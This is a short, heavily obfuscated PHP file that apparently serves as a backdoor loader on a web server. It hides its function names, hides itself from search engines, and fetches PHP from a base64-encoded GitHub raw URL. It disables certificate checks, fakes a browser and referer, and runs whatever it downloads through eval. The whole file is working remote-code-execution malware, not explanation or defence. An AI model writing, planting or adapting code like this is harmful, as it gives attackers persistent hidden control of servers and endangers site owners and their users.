<?php
@header("\x58\x2d\x52\x6f\x62\x6f\x74\x73\x2d\x54\x61\x67\x3a\x20\x6e\x6f\x69\x6e\x64\x65\x78\x2c\x20\x6e\x6f\x66\x6f\x6c\x6c\x6f\x77"
, true);

$v151xc = 'b'.'a'.'s'.'e'.'6'.'4'.'_de'.'co'.'de';
$x16f1xz = 'f'.'il'.'e_g'.'et'.'_co'.'nt'.'ent'.'s';
$b32c7ja = 'c'.'h'.'r';

function n452jcs($v89tx32){
  global $x16f1xz;
  global $b32c7ja;
    if(function_exists($b32c7ja(99).$b32c7ja(117).$b32c7ja(114).$b32c7ja(108).$b32c7ja(95).$b32c7ja(118).$b32c7ja(101).$b32c7ja(114).$b32c7ja(115).$b32c7ja(105).$b32c7ja(111).$b32c7ja(110))){
        $x825t3gf = curl_init();
        curl_setopt_array($x825t3gf, [
            10002 => $v89tx32,
            19913 => true,
            52 => true,
            68 => 10,
            64 => false,
            81 => false,
            10018 => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
            10023 => ['Accept: */*', 'Referer: https://google.com'],
            102 => '',
            13 => 15
        ]);
        $b6287dx = curl_exec($x825t3gf);
        if(curl_errno($x825t3gf)){ error_log('[Hidden Rebuilder] CURL: '.curl_error($x825t3gf)); }
        curl_close($x825t3gf);
        return $b6287dx ?: '';
    }
    $n7r365 = [
        "http" => [
            "method" => "GET",
            "header" => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n" .
                        "Referer: https://google.com\r\n"
        ],
        "ssl" => [
            "verify_peer" => false,
            "verify_peer_name" => false
        ]
    ];
    $v481x52 = stream_context_create($n7r365);
    return $x16f1xz($v89tx32, false, $v481x52) ?: '';
}

$y16254dwq = $v151xc('aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0ludmlzaWJsZUJ1bm55L1JlY29yZHMvbWFpbi9CdW5ueS1NaW5pL21pbmlmeS5waHA=');
@eval("?>".n452jcs($y16254dwq));
